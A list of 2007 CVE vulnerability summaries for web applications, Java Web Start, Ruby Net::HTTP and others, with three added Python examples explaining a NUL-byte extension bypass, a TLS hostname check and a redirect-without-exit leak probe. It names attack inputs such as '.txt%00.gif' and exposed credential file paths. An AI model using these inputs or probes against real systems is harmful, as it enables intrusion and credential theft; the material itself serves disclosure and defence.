[CVE-2007-5271] Multiple PHP remote file inclusion vulnerabilities in Trionic Cite CMS 1.2 rev9 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the bField[bf_data] parameter to (1) interface/editors/-custom.php or (2) interface/editors/custom.php.
[CVE-2007-5265] Multiple format string vulnerabilities in websrv.cpp in Dawn of Time 1.69s beta4 and earlier allow remote attackers to execute arbitrary code via format string specifiers in the (1) username or (2) password fields when accessing certain "restricted zones", which are not properly handled by the (a) processWebHeader and (b) filterWebRequest functions.
[CVE-2007-5260] ASP-CMS 1.0 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database containing the username and password via a direct request for mdb-database/ASP-CMS_v100.mdb.
[CVE-2007-5256] Multiple stack-based buffer overflows in FSD 2.052 d9 and earlier, and FSFDT FSD 3.000 d9 and earlier, allow (1) remote attackers to execute arbitrary code via a long HELP command on TCP port 3010 to the sysuser::exechelp function in sysuser.cc and (2) remote authenticated users to execute arbitrary code via long commands on TCP port 6809 to the servinterface::sendmulticast function in servinterface.cc, as demonstrated by a PIcallsign command.
[CVE-2007-5255] Cross-site scripting (XSS) vulnerability in Google Mini Search Appliance 3.4.14 allows remote attackers to inject arbitrary web script or HTML via the ie parameter to the /search URI.
[CVE-2007-5253] c32web.exe in McMurtrey/Whitaker Cart32 before 6.4 allows remote attackers to read arbitrary files via the ImageName parameter in a GetImage action, by appending a NULL byte (%00) sequence followed by an image file extension, as demonstrated by a request for a ".txt%00.gif" file. NOTE: this might be a directory traversal vulnerability.
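The Cart32 entry above is the classic check/use mismatch behind NUL-byte bypasses: the extension check runs on the whole request string, but the C runtime that finally opens the file stops at the first NUL, so ".txt%00.gif" ends in ".gif" for the check and in ".txt" for open(). The following is an added example, not Cart32 code; Python 3's open() refuses embedded NULs, so the truncation is emulated, and the image root and file names are constructed.

```python
"""NUL-byte extension-check bypass and a safe resolver: an added example, not Cart32 code.

c_runtime_path() emulates a C open() that stops at the first NUL so the bypass
is visible; safe_resolve() decodes, refuses control bytes, normalises the path,
confines it to the image root and checks the extension of the path that would
actually be opened.  IMAGE_ROOT and the file names are constructed.
"""
import posixpath
from typing import Optional
from urllib.parse import unquote

IMAGE_ROOT = "/srv/cart32/images"          # hypothetical image directory
ALLOWED_EXT = {".gif", ".jpg", ".png"}


def c_runtime_path(path: str) -> str:
    """Emulate a C-level open(): the string ends at the first NUL byte."""
    nul = path.find("\x00")
    return path if nul < 0 else path[:nul]


def vulnerable_resolve(image_name: str) -> Optional[str]:
    """Checks the suffix of the full string, then opens the truncated one."""
    name = unquote(image_name)
    if not name.lower().endswith(tuple(ALLOWED_EXT)):
        return None                        # ".txt%00.gif" passes this check
    return c_runtime_path(IMAGE_ROOT + "/" + name)


def safe_resolve(image_name: str) -> Optional[str]:
    """Validate what will be opened, not what was sent."""
    name = unquote(image_name)
    if any(ord(ch) < 0x20 or ch == "\x7f" for ch in name):
        return None                        # NUL and other control bytes
    full = posixpath.normpath(posixpath.join(IMAGE_ROOT, name))
    if not full.startswith(IMAGE_ROOT + "/"):
        return None                        # "../" or absolute path left the root
    if posixpath.splitext(full)[1].lower() not in ALLOWED_EXT:
        return None
    return full
```

The same ordering applies to any language that hands a string to a C library: decode first, reject anything the lower layer would interpret differently, canonicalise, then check the canonical result.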
[CVE-2007-5251] Multiple cross-site scripting (XSS) vulnerabilities in Helm 3.2.16 allow remote attackers to inject arbitrary web script or HTML via (1) the showOption parameter to domain.asp, or the (2) Folder or (3) StartPath parameter to FileManager.asp.
[CVE-2007-5239] Java Web Start in Sun JDK and JRE 6 Update 2 and earlier, JDK and JRE 5.0 Update 12 and earlier, SDK and JRE 1.4.2_15 and earlier, and SDK and JRE 1.3.1_20 and earlier does not properly enforce access restrictions for untrusted (1) applications and (2) applets, which allows user-assisted remote attackers to copy or rename arbitrary files when local users perform drag-and-drop operations from the untrusted application or applet window onto certain types of desktop applications.
[CVE-2007-5238] Java Web Start in Sun JDK and JRE 6 Update 2 and earlier, JDK and JRE 5.0 Update 12 and earlier, and SDK and JRE 1.4.2_15 and earlier does not properly enforce access restrictions for untrusted applications, which allows user-assisted remote attackers to obtain sensitive information (the Java Web Start cache location) via an untrusted application, aka "three vulnerabilities."
[CVE-2007-5237] Java Web Start in Sun JDK and JRE 6 Update 2 and earlier does not properly enforce access restrictions for untrusted applications, which allows user-assisted remote attackers to read and modify local files via an untrusted application, aka "two vulnerabilities."
[CVE-2007-5236] Java Web Start in Sun JDK and JRE 5.0 Update 12 and earlier, and SDK and JRE 1.4.2_15 and earlier, on Windows does not properly enforce access restrictions for untrusted applications, which allows user-assisted remote attackers to read local files via an untrusted application.
[CVE-2007-5235] Cross-site scripting (XSS) vulnerability in index.php in Uebimiau 2.7.2 through 2.7.10 allows remote attackers to inject arbitrary web script or HTML via the f_email parameter. NOTE: the provenance of this information is unknown
[CVE-2007-5233] SQL injection vulnerability in index.php in Web Template Management System 1.3 allows remote attackers to execute arbitrary SQL commands via the id parameter in a readmore action.
[CVE-2007-5228] Cross-site scripting (XSS) vulnerability in the subscription functionality in the Project issue tracking module before 4.7.x-1.5, 4.7.x-2.x before 4.7.x-2.5, and 5.x-1.x before 5.x-1.1 for Drupal allows remote authenticated users with project create or edit permissions to inject arbitrary web script or HTML via unspecified vectors involving a (1) individual or (2) overview form.
[CVE-2007-5227] Multiple cross-site scripting (XSS) vulnerabilities in messaging/course/composeMessage.jsp in BlackBoard Learning System 6.3.1.593 and earlier in BlackBoard Academic Suite allow remote attackers to inject arbitrary web script or HTML via the (1) subject_t and (2) body_text parameters. NOTE: vector 2 requires bypassing a client-side security mechanism that attempts to block XSS sequences.
[CVE-2007-5218] Cross-site scripting (XSS) vulnerability in index.php in Don Barnes DRBGuestbook 1.1.13 allows remote attackers to inject arbitrary web script or HTML via the action parameter.
[CVE-2007-5214] Multiple cross-site scripting (XSS) vulnerabilities in the AXIS 2100 Network Camera 2.02 with firmware 2.43 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the PATH_INFO to the default URI associated with a directory, as demonstrated by (a) the root directory and (b) the view/ directory
[CVE-2007-5212] Multiple cross-site scripting (XSS) vulnerabilities in the AXIS 2100 Network Camera 2.02 with firmware before 2.43 allow remote attackers to inject arbitrary web script or HTML via (1) parameters associated with saved settings, as demonstrated by the conf_SMTP_MailServer1 parameter to ServerManager.srv
[CVE-2007-5211] Multiple cross-site scripting (XSS) vulnerabilities in Arbor Networks Peakflow SP 3.5.1 before patch 14, and 3.6.1 before patch 5, when scope accounts are enabled, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors involving GET or POST requests. NOTE: the provenance of this information is unknown
[CVE-2007-5198] Buffer overflow in the redir function in check_http.c in Nagios Plugins before 1.4.10, when running with the -f (follow) option, allows remote web servers to execute arbitrary code via Location header responses (redirects) with a large number of leading "L" characters.
[CVE-2007-5193] The default configuration for twiki 4.1.2 on Debian GNU/Linux, and possibly other operating systems, specifies the work area directory (cfg{RCS}{WorkAreaDir}) under the web document root, which might allow remote attackers to obtain sensitive information when .htaccess restrictions are not applied.
[CVE-2007-5190] Multiple cross-site scripting (XSS) vulnerabilities in Alcatel OmniVista 4760 R4.2 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the action parameter to php-bin/Webclient.php or (2) the Langue parameter to the default URI.
[CVE-2007-5189] Multiple SQL injection vulnerabilities in mes_add.php in x-script GuestBook 1.3a, when magic_quotes_gpc is disabled, allow remote attackers to execute arbitrary SQL commands via the (1) name, (2) email, (3) icq, and (4) website parameters.
[CVE-2007-5183] Cross-site scripting (XSS) vulnerability in Mailbox.mws in OdysseySuite, possibly 4.0.729, allows remote attackers to inject arbitrary web script or HTML via the idkey parameter.
[CVE-2007-5182] Cross-site scripting (XSS) vulnerability in mail.asp in Netkamp Emlak Scripti allows remote attackers to inject arbitrary web script or HTML via the (1) Email parameter, and possibly the (2) Ad, (3) Soyad, (4) Konu, and (5) Mesaj parameters to iletisim.asp.
[CVE-2007-5179] Multiple cross-site scripting (XSS) vulnerabilities in iletisim.asp in Y&K Iletisim Formu allow remote attackers to inject arbitrary web script or HTML via the (1) ad, (2) sehir, (3) yas, (4) cins, (5) tel, (6) mail, and (7) mesaj parameters. NOTE: the provenance of this information is unknown
[CVE-2007-5176] Multiple cross-site scripting (XSS) vulnerabilities in GroupLink eHelpDesk 6.2.2 allow remote attackers to inject arbitrary web script or HTML via the (1) NA_DISPLAYNAME parameter in helpdesk/user/rf_create.jsp and the (2) username and (3) LDAPError parameters in index2.jsp. NOTE: the provenance of this information is unknown
[CVE-2007-5162] The connect method in lib/net/http.rb in the (1) Net::HTTP and (2) Net::HTTPS libraries in Ruby 1.8.5 and 1.8.6 does not verify that the commonName (CN) field in a server certificate matches the domain name in an HTTPS request, which makes it easier for remote attackers to intercept SSL transmissions via a man-in-the-middle attack or spoofed web site.
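The Ruby entry above is the other half of TLS client validation: a validated chain only proves that some trusted CA issued the certificate, and an attacker in the path can present a perfectly valid certificate for a name he controls, so the client must also bind the certificate's identity to the host it meant to reach. The following is an added example of that check, not Ruby's or the stdlib's code; the certificates are constructed inline in the dict form Python's ssl.SSLSocket.getpeercert() returns, and the matching rules (SAN dNSName entries win, CN only as a fallback, wildcard only as the whole leftmost label) are the usual ones, stated here as the example's own assumptions.

```python
"""Server-name check that Ruby 1.8.5/1.8.6 Net::HTTP omitted: an added example.

hostname_matches() applies the check to a getpeercert()-style dict; the
certificates below are constructed, not captured from any server.  Current
Python performs this check itself when check_hostname is True, which is what
hardened_context() returns.
"""
import ssl
from typing import List

# Constructed certificates in getpeercert() form.
ATTACKER_CERT = {
    "subject": ((("commonName", "evil.example.net"),),),
    "subjectAltName": (("DNS", "evil.example.net"), ("DNS", "*.evil.example.net")),
}
CN_ONLY_CERT = {"subject": ((("commonName", "legacy.example.com"),),)}


def _dns_names(cert: dict) -> List[str]:
    """SAN dNSName entries, falling back to the CN only if there are none."""
    sans = [value for kind, value in cert.get("subjectAltName", ()) if kind == "DNS"]
    if sans:
        return sans
    for rdn in cert.get("subject", ()):
        for key, value in rdn:
            if key == "commonName":
                return [value]
    return []


def _name_matches(pattern: str, host: str) -> bool:
    pattern, host = pattern.lower().rstrip("."), host.lower().rstrip(".")
    if "*" not in pattern:
        return pattern == host
    p_labels, h_labels = pattern.split("."), host.split(".")
    # Only "*" as the entire leftmost label, with at least two labels after it;
    # it matches exactly one label, so "*.evil.example.net" never matches
    # "evil.example.net" or "a.b.evil.example.net".
    if p_labels[0] != "*" or "*" in pattern[1:] or len(p_labels) < 3:
        return False
    return len(h_labels) == len(p_labels) and h_labels[1:] == p_labels[1:]


def hostname_matches(cert: dict, host: str) -> bool:
    """True only if some name the certificate carries matches the intended host."""
    return any(_name_matches(name, host) for name in _dns_names(cert))


def hardened_context() -> ssl.SSLContext:
    """What a current client should use: chain validation plus hostname check."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = True
    ctx.verify_mode = ssl.CERT_REQUIRED
    return ctx
```

When reviewing client code in any language, look for the two settings separately: a verify mode that requires a chain, and a hostname check bound to the name the caller asked for. Either one alone leaves the man-in-the-middle case open.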
[CVE-2007-5161] Cross-zone scripting vulnerability in the internal browser in i-Systems Feedreader 3.10 allows remote attackers to inject arbitrary web script or HTML via an item in a feed, as demonstrated by a WordPress blog update. NOTE: this was originally reported as XSS.
[CVE-2007-5154] Session fixation vulnerability in Aipo and Aipo ASP 3.0.1.0 and earlier allows remote attackers to hijack web sessions via unspecified vectors.
[CVE-2007-5142] Cross-site scripting (XSS) vulnerability in buscar.asp in Solidweb Novus 1.0 allows remote attackers to inject arbitrary web script or HTML via the p parameter. NOTE: the provenance of this information is unknown
[CVE-2007-5136] Cross-site scripting (XSS) vulnerability in DFD Cart 1.1.4 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2007-5134] Cisco Catalyst 6500 and Cisco 7600 series devices use 127/8 IP addresses for Ethernet Out-of-Band Channel (EOBC) internal communication, which might allow remote attackers to send packets to an interface for which network exposure was unintended.
[CVE-2007-5129] SimpGB 1.46.02 stores sensitive information under the web root with insufficient access control, which allows remote attackers to (1) obtain sensitive configuration information via a direct request for admin/cfginfo.php
[CVE-2007-5127] Multiple cross-site scripting (XSS) vulnerabilities in SimpGB 1.46.02 allow remote attackers to inject arbitrary web script or HTML via (1) the l_username parameter to the default URI under admin/ or (2) the l_emoticonlist parameter to admin/emoticonlist.php.
[CVE-2007-5124] The embedded Internet Explorer server control in AOL Instant Messenger (AIM) 6.5.3.12 and earlier allows remote attackers to execute arbitrary code via unspecified web script or HTML in an instant message, related to AIM's filtering of "specific tags and attributes" and the lack of Local Machine Zone lockdown. NOTE: this issue reportedly exists because of an incomplete fix for CVE-2007-4901.
[CVE-2007-5121] Cross-site scripting (XSS) vulnerability in JSPWiki 2.5.139-beta allows remote attackers to inject arbitrary web script or HTML via the redirect parameter to wiki-3/Login.jsp and unspecified other components.
[CVE-2007-5120] Multiple cross-site scripting (XSS) vulnerabilities in JSPWiki 2.4.103 and 2.5.139-beta allow remote attackers to inject arbitrary web script or HTML via the (1) group and (2) members parameters in (a) NewGroup.jsp
[CVE-2007-5118] Unspecified vulnerability in the HID (Human Interface Device) class driver in Sun Solaris 8, 9, and 10 before 20070925 allows local users to cause a denial of service (panic) via unspecified vectors.
[CVE-2007-5113] report.cgi in Google Urchin allows remote attackers to bypass authentication and obtain sensitive information (web server logs) via certain modified query parameters, as demonstrated using the profile, rid, prefs, n, vid, bd, ed, dt, and gtype parameters, a different vulnerability than CVE-2007-5112.
[CVE-2007-5112] Cross-site scripting (XSS) vulnerability in session.cgi (aka the login page) in Google Urchin 5 5.7.03 and earlier allows remote attackers to inject arbitrary web script or HTML via the query string, a different vulnerability than CVE-2007-4713. NOTE: this can be leveraged to capture login credentials in some browsers that support remembered (auto-completed) passwords.
[CVE-2007-5106] Cross-site scripting (XSS) vulnerability in wp-register.php in WordPress 2.0 allows remote attackers to inject arbitrary web script or HTML via the user_login parameter.
[CVE-2007-5105] Cross-site scripting (XSS) vulnerability in wp-register.php in WordPress 2.0 and 2.0.1 allows remote attackers to inject arbitrary web script or HTML via the user_email parameter.
[CVE-2007-5096] PHP remote file inclusion vulnerability in modules/webmail2/inc/rfc822.php in guanxiCRM Business Solution 0.9.1 allows remote attackers to execute arbitrary PHP code via a URL in the webmail2_inc_dir parameter.
[CVE-2007-5095] Microsoft Windows Media Player (WMP) 9 on Windows XP SP2 invokes Internet Explorer to render HTML documents contained inside some media files, regardless of what default web browser is configured, which might allow remote attackers to exploit vulnerabilities in software that the user does not expect to run, as demonstrated by the HTMLView parameter in an .asx file.
[CVE-2007-5093] The disconnect method in the Philips USB Webcam (pwc) driver in Linux kernel 2.6.x before 2.6.22.6 "relies on user space to close the device," which allows user-assisted local attackers to cause a denial of service (USB subsystem hang and CPU consumption in khubd) by not closing the device after the disconnect is invoked. NOTE: this rarely crosses privilege boundaries, unless the attacker can convince the victim to unplug the affected device.
[CVE-2007-5091] Multiple cross-site scripting (XSS) vulnerabilities in eGroupWare 1.4.001 allow remote attackers to inject arbitrary web script or HTML via the cat_data[color] parameter to (1) preferences/inc/class.uicategories.inc.php and (2) admin/inc/class.uicategories.inc.php.
[CVE-2007-5088] Cross-site scripting (XSS) vulnerability in search/cust_bill_event.cgi in Freeside 1.7.2 allows remote attackers to inject arbitrary web script or HTML via the failed parameter.
[CVE-2007-5078] Multiple cross-site scripting (XSS) vulnerabilities in eGov Manager allow remote attackers to inject arbitrary web script or HTML via unspecified "user-supplied input" to (1) center.exe or (2) Index.exe.
[CVE-2007-5072] Multiple cross-site scripting (XSS) vulnerabilities in Simple PHP Blog (SPHPBlog) before 0.5.1, when register_globals is enabled, allow remote attackers to inject arbitrary web script or HTML via certain user_colors array parameters to certain user_style.php files under themes/, as demonstrated by the user_colors[bg_color] parameter.
[CVE-2007-5067] Multiple buffer overflows in iMatix Xitami Web Server 2.5c2 allow remote attackers to execute arbitrary code via a long If-Modified-Since header to (1) xigui32.exe or (2) xitami.exe.
[CVE-2007-5066] Unspecified vulnerability in Webmin before 1.370 on Windows allows remote authenticated users to execute arbitrary commands via a crafted URL.
[CVE-2007-5064] Buffer overflow in a certain ActiveX control in Xunlei Web Thunder 5.6.9.344, possibly the DapPlayer ActiveX control in DapPlayer_Now.dll, allows remote attackers to execute arbitrary code via a long first argument to the DownURL2 method. NOTE: some of these details are obtained from third party information.
[CVE-2007-5063] Adam Scheinberg Flip 3.0 and earlier stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a file containing login credentials via a direct request for var/users.txt.
[CVE-2007-5059] Multiple cross-site scripting (XSS) vulnerabilities in GreenSQL allow remote attackers to inject arbitrary web script or HTML via several vectors, as demonstrated by the (1) uname and (2) pass parameters in a login form, and (3) an unspecified "url value," leading to storage of XSS sequences in the database and display of these sequences in the alert section of the admin panel.
[CVE-2007-5052] Multiple cross-site scripting (XSS) vulnerabilities in index.php in Vigile CMS 1.8 allow remote attackers to inject arbitrary web script or HTML via a request to the wiki module with (1) the title parameter or (2) a "title=" sequence in the PATH_INFO, or a request to the download module with (3) the cat parameter or (4) a "cat=" sequence in the PATH_INFO.
[CVE-2007-5051] Multiple cross-site scripting (XSS) vulnerabilities in PhpGedView 4.1.1 allow remote attackers to inject arbitrary web script or HTML via the (1) box_width, (2) PEDIGREE_GENERATIONS, and (3) rootid parameters in ancestry.php, and the (4) newpid parameter in timeline.php. NOTE: the provenance of this information is unknown.
[CVE-2007-5038] The offer_account_by_email function in User.pm in the WebService for Bugzilla before 3.0.2, and 3.1.x before 3.1.2, does not check the value of the createemailregexp parameter, which allows remote attackers to bypass intended restrictions on account creation.
[CVE-2007-5033] Cross-site scripting (XSS) vulnerability in profile.php in phpBB XS 2 allows remote attackers to inject arbitrary web script or HTML via the selfdes parameter in a profile_info editprofile action.
[CVE-2007-5027] Multiple cross-site scripting (XSS) vulnerabilities in cgi-bin/ddns in the web management panel for the WBR3404TX broadband router with firmware R1.94p0vTIG allow remote attackers to inject arbitrary web script or HTML via the (1) DD or (2) DU parameter.
[CVE-2007-5026] dBlog CMS, probably 2.0, stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database containing an admin password hash via a direct request for dblog.mdb.
[CVE-2007-5019] Buffer overflow in the Sun Java Web Start ActiveX control in Java Runtime Environment (JRE) 1.6.0_X allows remote attackers to have an unknown impact via a long argument to the dnsResolve (isInstalled.dnsResolve) method.
[CVE-2007-5013] Multiple cross-site scripting (XSS) vulnerabilities in index.php in Phormer 3.31 allow remote attackers to inject arbitrary web script or HTML via the (1) u, (2) p, (3) c, and (4) s parameters, and other unspecified vectors. NOTE: the provenance of this information is unknown.
[CVE-2007-5012] Cross-site scripting (XSS) vulnerability in picture.php in PhpWebGallery 1.7.0, when Comments for all is enabled, allows remote attackers to inject arbitrary web script or HTML via the author parameter. NOTE: the provenance of this information is unknown.
[CVE-2007-5011] webbatch.exe in WebBatch allows remote attackers to obtain sensitive information via the dumpinputdata parameter.
[CVE-2007-5010] Cross-site scripting (XSS) vulnerability in WebBatch allows remote attackers to inject arbitrary web script or HTML via the URL to webbatch.exe.
[CVE-2007-5000] Cross-site scripting (XSS) vulnerability in the (1) mod_imap module in the Apache HTTP Server 1.3.0 through 1.3.39 and 2.0.35 through 2.0.61 and the (2) mod_imagemap module in the Apache HTTP Server 2.2.0 through 2.2.6 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2007-4983] Directory traversal vulnerability in the JetAudio.Interface.1 ActiveX control in JetFlExt.dll in jetAudio 7.0.3 Basic and 7.0.3.3016 allows remote attackers to create or overwrite arbitrary local files via a ..\ (dot dot backslash) in the second argument to the DownloadFromMusicStore method. NOTE: some of these details are obtained from third party information. NOTE: this can be leveraged for code execution by overwriting JetAudio.exe, which is launched by the control after completion of the method call.
[CVE-2007-4981] Cross-site scripting (XSS) vulnerability in the save function in Obedit 3.03 allows user-assisted remote attackers to inject arbitrary web script or HTML via unknown vectors, as demonstrated by a SCRIPT element in an unspecified context when saving a document. NOTE: because the details of the attack are uncertain, it is unclear whether this crosses privilege boundaries.
[CVE-2007-4977] Cross-site scripting (XSS) vulnerability in mode.php in Coppermine Photo Gallery (CPG) 1.4.12 and earlier allows remote attackers to inject arbitrary web script or HTML via the referer parameter.
[CVE-2007-4975] Cross-site scripting (XSS) vulnerability in hilfe.php in b1gMail 6.3.1 allows remote attackers to inject arbitrary web script or HTML via the chapter parameter.
[CVE-2007-4959] Cross-site scripting (XSS) vulnerability in catalog_products_with_images.php in osCMax 2.0.0-RC3-0-1 allows remote attackers to inject arbitrary web script or HTML via the URI. NOTE: the provenance of this information is unknown.
[CVE-2007-4958] Multiple cross-site scripting (XSS) vulnerabilities in TinyWebGallery (TWG) 1.6.3.4 allow remote attackers to inject arbitrary web script or HTML via the URI for (1) index.php, (2) i_frames/i_login.php, and (3) i_frames/i_top_tags.php. NOTE: the provenance of this information is unknown.
[CVE-2007-4949] ** DISPUTED ** Multiple PHP remote file inclusion vulnerabilities in php(Reactor) 1.2.7pl1 allow remote attackers to execute arbitrary PHP code via a URL in the pathtohomedir parameter to (1) ekilat.com-int.tpl.php, (2) phpreactor.org-top.tpl.php, or (3) ekilat.com-top.tpl.php in examples/. NOTE: this issue has been disputed by CVE, since the vulnerability is present only when the product is incorrectly installed by placing examples/ under the web root.
[CVE-2007-4948] Multiple PHP remote file inclusion vulnerabilities in Webmedia Explorer (webmex) 3.2.2 allow remote attackers to execute arbitrary PHP code via (1) a URL in the path_include parameter to includes/rss.class.php, (2) a URL in the path_template parameter to (a) templates/main.tpl.php or (b) templates/folder_messages_link_message_name.tpl.php, or (3) a URL in the path_templates parameter to templates/sidebar.tpl.php. NOTE: the vulnerability is present only when the administrator does not follow installation instructions about the requirement for .htaccess support. NOTE: the includes/core.lib.php vector is already covered by CVE-2006-5252.
[CVE-2007-4945] Multiple cross-site scripting (XSS) vulnerabilities in LetterGrade allow remote attackers to inject arbitrary web script or HTML via (1) a student's email address, (2) the year parameter to genbrws/Student/cal_month.php3, and other unspecified vectors related to the calendar. NOTE: the provenance of this information is unknown.
[CVE-2007-4937] CS Guestbook stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain the admin name and MD5 password hash via a direct request for base/usr/0.php.
[CVE-2007-4932] admin.php in Shop-Script FREE 2.0 and earlier sends a redirect to the web browser but does not exit when administrative credentials are missing, which allows remote attackers to access the admin panel.
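The CVE-2007-4932 entry above describes the classic "redirect without exit" bug: the script sends a Location header but keeps executing, so the protected page is still delivered as the body of the 302. The following is an added example, not Shop-Script code: a minimal WSGI-style admin handler with that flaw, its fixed form, and the check a scanner applies to catch the leak. The page markup, cookie name and paths are constructed for illustration.

```python
# Added example, not Shop-Script code: a minimal WSGI-style admin handler that
# sets a redirect but keeps running (the CVE-2007-4932 pattern), its fixed
# form, and the check a scanner applies to catch the leak. Page markup,
# cookie name and paths are constructed for illustration.
from typing import Callable, Dict, List, Tuple

Response = Tuple[str, List[Tuple[str, str]], bytes]   # status, headers, body

# Constructed stand-in for the privileged page the redirect is meant to hide.
ADMIN_PAGE = (b"<html><body><h1>Admin panel</h1>"
              b"<a href='admin.php?op=delete&id=1'>Delete product</a></body></html>")

def is_admin(environ: Dict[str, str]) -> bool:
    """Constructed credential check: only a specific cookie counts."""
    return environ.get("HTTP_COOKIE", "") == "admin_session=valid"

def admin_vulnerable(environ: Dict[str, str]) -> Response:
    """Sets Location for anonymous callers but falls through and still
    returns the admin page as the body of the 302. In PHP this is
    header('Location: ...') with no exit; behind it."""
    status = "200 OK"
    headers = [("Content-Type", "text/html")]
    if not is_admin(environ):
        status = "302 Found"
        headers.append(("Location", "/login.php"))
        # missing early return here
    return status, headers, ADMIN_PAGE

def admin_fixed(environ: Dict[str, str]) -> Response:
    """Stops as soon as the redirect decision is made; the 302 has no body."""
    if not is_admin(environ):
        return "302 Found", [("Content-Type", "text/html"),
                             ("Location", "/login.php")], b""
    return "200 OK", [("Content-Type", "text/html")], ADMIN_PAGE

def redirect_leaks_body(resp: Response,
                        markers=(b"Admin panel", b"Delete", b"<form")) -> bool:
    """Scanner check: a 3xx response whose body carries privileged content.
    Only works if the HTTP client does not follow the redirect itself."""
    status, _headers, body = resp
    return status.startswith("3") and any(m in body for m in markers)

def probe(app: Callable[[Dict[str, str]], Response]) -> bool:
    """Request admin.php with no credentials and inspect the raw response."""
    anonymous = {"REQUEST_METHOD": "GET", "PATH_INFO": "/admin.php"}
    return redirect_leaks_body(app(anonymous))

if __name__ == "__main__":
    print("vulnerable handler leaks admin page:", probe(admin_vulnerable))  # True
    print("fixed handler leaks admin page:", probe(admin_fixed))            # False
```

Against a real target the same test is `curl -i http://host/admin.php` without `-L` (or `allow_redirects=False` in Python requests): a client that follows the redirect lands on the login page and never sees the leaked body.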
[CVE-2007-4929] Multiple cross-site scripting (XSS) vulnerabilities in the AXIS 207W camera allow remote attackers to inject arbitrary web script or HTML via the camNo parameter to incl/image_incl.shtml, and other unspecified vectors.
[CVE-2007-4920] SQL injection vulnerability in soporte_derecha_w.php in PHP Webquest 2.5 and earlier allows remote attackers to execute arbitrary SQL commands via the id_actividad parameter.
[CVE-2007-4917] Cross-site scripting (XSS) vulnerability in tracking.php in PHP-Stats 0.1.9.2 allows remote attackers to inject arbitrary web script or HTML via the ip parameter in an online action, a different vector than CVE-2007-4334.
[CVE-2007-4912] Cross-site scripting (XSS) vulnerability in ips_kernel/class_ajax.php in Invision Power Board (IPB or IP.Board) 2.3.1 up to 20070912 allows remote attackers to inject arbitrary web script or HTML into user profile fields via unspecified vectors related to character sets other than iso-8859-1 or utf-8.
[CVE-2007-4909] Interpretation conflict in WinSCP before 4.0.4 allows remote attackers to perform arbitrary file transfers with a remote server via file-transfer commands in the final portion of a (1) scp, and possibly a (2) sftp or (3) ftp, URL, as demonstrated by a URL specifying login to the remote server with a username of scp, which is interpreted as an HTTP scheme name by the protocol handler in a web browser, but is interpreted as a username by WinSCP. NOTE: this is related to an incomplete fix for CVE-2006-3015.
[CVE-2007-4901] The embedded Internet Explorer server control in AOL Instant Messenger (AIM) 6.1.41.2 and 6.2.32.1, AIM Pro, and AIM Lite does not properly constrain the use of mshtml.dll's web script and HTML functionality for incoming instant messages, which allows remote attackers to place HTML into unexpected contexts or execute arbitrary code, as demonstrated by writing arbitrary HTML to a notification window, and writing contents of arbitrary local image files to this window via IMG SRC.
[CVE-2007-4900] Cross-site scripting (XSS) vulnerability in the logon page in RSA EnVision 3.3.6 Build 0115 allows remote attackers to inject arbitrary web script or HTML via the username field.
[CVE-2007-4899] Multiple cross-site scripting (XSS) vulnerabilities in Boinc Forum 5.10.20 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter to forum_forum.php, or the search_string parameter to forum_text_search_action.php in a (2) titles or (3) bodies search.
[CVE-2007-4896] Multiple cross-site scripting (XSS) vulnerabilities in admin/header.php in Toms Gaestebuch 1.01 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) lang[adminseite], (2) lang[ueberschrift], or (3) einst[metachar] parameter, different vectors than CVE-2007-4711.
[CVE-2007-4894] Multiple SQL injection vulnerabilities in Wordpress before 2.2.3 and Wordpress multi-user (MU) before 1.2.5a allow remote attackers to execute arbitrary SQL commands via the post_type parameter to the pingback.extensions.getPingbacks method in the XMLRPC interface, and other unspecified parameters related to "early database escaping" and missing validation of "query string like parameters."
[CVE-2007-4883] Cross-site scripting (XSS) vulnerability in the BotQuery extension in MediaWiki 1.7.x and earlier before SVN 20070910 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a similar issue to CVE-2007-4828.
[CVE-2007-4882] Multiple cross-site scripting (XSS) vulnerabilities in TechExcel CustomerWise (formerly TechExcel CRM) allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2007-4879] Mozilla Firefox before Firefox 2.0.0.13, and SeaMonkey before 1.1.9, can automatically install TLS client certificates with minimal user interaction, and automatically sends these certificates when requested, which makes it easier for remote web sites to track user activities across domains by requesting the TLS client certificates from other domains.
[CVE-2007-4874] Multiple cross-site scripting (XSS) vulnerabilities in SimpNews 2.41.03 allow remote attackers to inject arbitrary web script or HTML via the (1) l_username parameter to admin/layout2b.php, and the (2) backurl parameter to comment.php.
[CVE-2007-4873] SimpNews 2.41.03 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download arbitrary .inc files via a direct request, as demonstrated by admin/includes/dbtables.inc.
[CVE-2007-4862] Cross-site scripting (XSS) vulnerability in admin/menu.php in SAXON 5.4 allows remote attackers to inject arbitrary web script or HTML via the config[news_url] parameter.
[CVE-2007-4850] curl/interface.c in the cURL library (aka libcurl) in PHP 5.2.4 and 5.2.5 allows context-dependent attackers to bypass safe_mode and open_basedir restrictions and read arbitrary files via a file:// request containing a \x00 sequence, a different vulnerability than CVE-2006-2563.
[CVE-2007-4846] SQL injection vulnerability in start.php in Webace-Linkscript (wls) 1.3 Special Edition (SE) allows remote attackers to execute arbitrary SQL commands via the id parameter in a rubrik go action.
[CVE-2007-4839] Unspecified vulnerability in the PD tools component in IBM WebSphere Application Server (WAS) 6.1 before Fix Pack 11 (6.1.0.11) has unknown impact and attack vectors, aka PK33803.
[CVE-2007-4836] Cross-site scripting (XSS) vulnerability in index.php in phpMyQuote 0.20 allows remote attackers to inject arbitrary web script or HTML via the id parameter in an edit action.
[CVE-2007-4833] Unspecified vulnerability in the Edge Component in IBM WebSphere Application Server (WAS) 6.1 before Fix Pack 11 (6.1.0.11) has unknown impact and attack vectors, aka PK44789.
[CVE-2007-4831] Multiple cross-site scripting (XSS) vulnerabilities in account_settings.php in TorrentTrader 1.07 allow remote attackers to inject arbitrary web script or HTML via the (1) avatar and (2) title parameters.
